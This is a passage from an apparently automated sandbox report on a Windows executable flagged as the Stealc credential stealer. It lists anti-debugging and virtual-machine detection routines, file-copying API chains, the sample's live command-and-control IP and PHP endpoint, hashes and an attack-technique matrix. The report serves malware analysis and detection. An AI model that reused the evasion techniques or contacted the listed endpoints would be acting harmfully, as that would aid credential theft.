                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0329 second address: 50D0342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c mov eax, 5247094Bh 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0342 second address: 50D0346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0346 second address: 50D034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D034C second address: 50D038D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 7Ch 0x00000005 mov eax, 73F176B3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F66B07B4FABh 0x00000017 sbb cx, E91Eh 0x0000001c jmp 00007F66B07B4FB9h 0x00000021 popfd 0x00000022 mov si, 9AE7h 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D038D second address: 50D0393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0393 second address: 50D0397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0397 second address: 50D03C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 jmp 00007F66B1272F68h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D03C0 second address: 50D03C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D03C6 second address: 50D03CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D046F second address: 50D0474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0474 second address: 50D04CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F66B1272F5Eh 0x00000012 adc ah, 00000058h 0x00000015 jmp 00007F66B1272F5Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F66B1272F66h 0x00000023 adc cx, 1FB8h 0x00000028 jmp 00007F66B1272F5Bh 0x0000002d popfd 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D04CD second address: 50D04FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 pushad 0x00000009 call 00007F66B07B4FB2h 0x0000000e movzx eax, bx 0x00000011 pop edx 0x00000012 call 00007F66B07B4FACh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C41C2F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C3F5CA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E12944 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DF45BA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E73DA9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009F38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009F4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_009EDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_009EE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_009EED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009F4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EF68A FindFirstFileA,0_2_009EF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009EF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009F3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009E16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009EDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_009EBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E1160 GetSystemInfo,ExitProcess,0_2_009E1160
                Source: file.exe, file.exe, 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareA
                Source: file.exe, 00000000.00000002.2101658537.0000000001411000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101658537.00000000013E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13654
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13657
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13669
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13709
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13674
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E45C0 VirtualProtect ?,00000004,00000100,000000000_2_009E45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009F9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F9750 mov eax, dword ptr fs:[00000030h]0_2_009F9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009F78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3356, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_009F9600
                Source: file.exe, file.exe, 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: {+lProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_009F7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_009F7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_009F7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_009F7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.9e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2051322816.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3356, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.9e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2051322816.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3356, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/true
                  		unknown
                  http://185.215.113.206/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/e2b1563c6670f193.php/file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/e2b1563c6670f193.phpJfile.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/3C;file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.206
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1543217
                            Start date and time:2024-10-27 13:03:07 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 10s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 90
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206
                            SecuriteInfo.com.Win32.Evo-gen.20836.29869.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.9463678010723795
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'866'752 bytes
                            MD5:d42e9bebeb9d3f72398f5a5211b649e1
                            SHA1:677dc85715152bdc047d55a0a7843ea53690274c
                            SHA256:70d701780ae74623c6f20f75516cecba15aff040750f911bc73b311a5482b622
                            SHA512:8f9638b2783508aa29b36626a8520858a0cc71cdd5daa055edef9ca4e833edd1ec39cb0549d821b7b19fb75d2af74268fb98bbce00ab57fb257aeac3c4dfe450
                            SSDEEP:49152:w5/Y2wL1rcthKSQaL4EatSJrH2RtQBguaCj6gZ:w5/Y1eCSQaL4EaBuBgu6A
                            TLSH:3E85338A455F652DCF8B43F81F390CD4C82C2E77D778125BA672B1295BBB2D838150EA
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xaa5000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F66B068D07Ah
                            cvtps2pd xmm3, qword ptr [eax+eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007F66B068F075h
                            add byte ptr [ebx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edi], bh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edx], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
